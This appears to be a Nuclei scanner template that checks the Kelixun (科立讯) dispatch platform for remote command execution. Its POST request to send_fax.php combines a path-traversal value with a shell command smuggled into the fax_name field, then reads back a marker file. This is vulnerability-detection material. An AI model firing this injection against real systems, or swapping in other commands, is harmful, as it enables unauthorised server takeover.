http:
    - raw:
        - |
          POST /custom/zx/fax/send_fax.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc

          ------WebKitFormBoundaryJpMyThWnAxbcBBQc
          Content-Disposition: form-data; name="sendfile";filename="{{username}}.php";
          Content-Type: text/plain

          {{username}}
          ------WebKitFormBoundaryJpMyThWnAxbcBBQc
          Content-Disposition: form-data; name="fax_extention"

          ../../../../../..
          ------WebKitFormBoundaryJpMyThWnAxbcBBQc
          Content-Disposition: form-data; name="fax_caller_id_name"

          file
          ------WebKitFormBoundaryJpMyThWnAxbcBBQc
          Content-Disposition: form-data; name="fax_caller_id_number"

          file
          ------WebKitFormBoundaryJpMyThWnAxbcBBQc
          Content-Disposition: form-data; name="fax_name"

          ;echo   `echo pboyjnnrfipmplsukdeczudsefxmywe`|tee        {{username}}.txt;.pdf
          ------WebKitFormBoundaryJpMyThWnAxbcBBQc--
    - matchers:
        - part: body
          type: word
          words:
            - pboyjnnrfipmplsukdeczudsefxmywe
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /custom/zx/fax/{{username}}.txt HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
id: kelixun-feedback-RCE
info:
    author: Superhero
    description: |-
        fofa: app="指挥调度管理平台"
        科立讯通信指挥调度管理平台 feedback 存在远程命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限，可能导致内网进一步被攻击。
    name: 科立讯通信指挥调度管理平台 feedback 远程命令执行漏洞
    reference:
        - https://mp.weixin.qq.com/s/ryGbi2ETOmhmNkgdQXwiSg
    severity: high
    tags:
        - 指挥调度管理平台
variables:
    username: '{{to_lower(rand_base(6))}}'
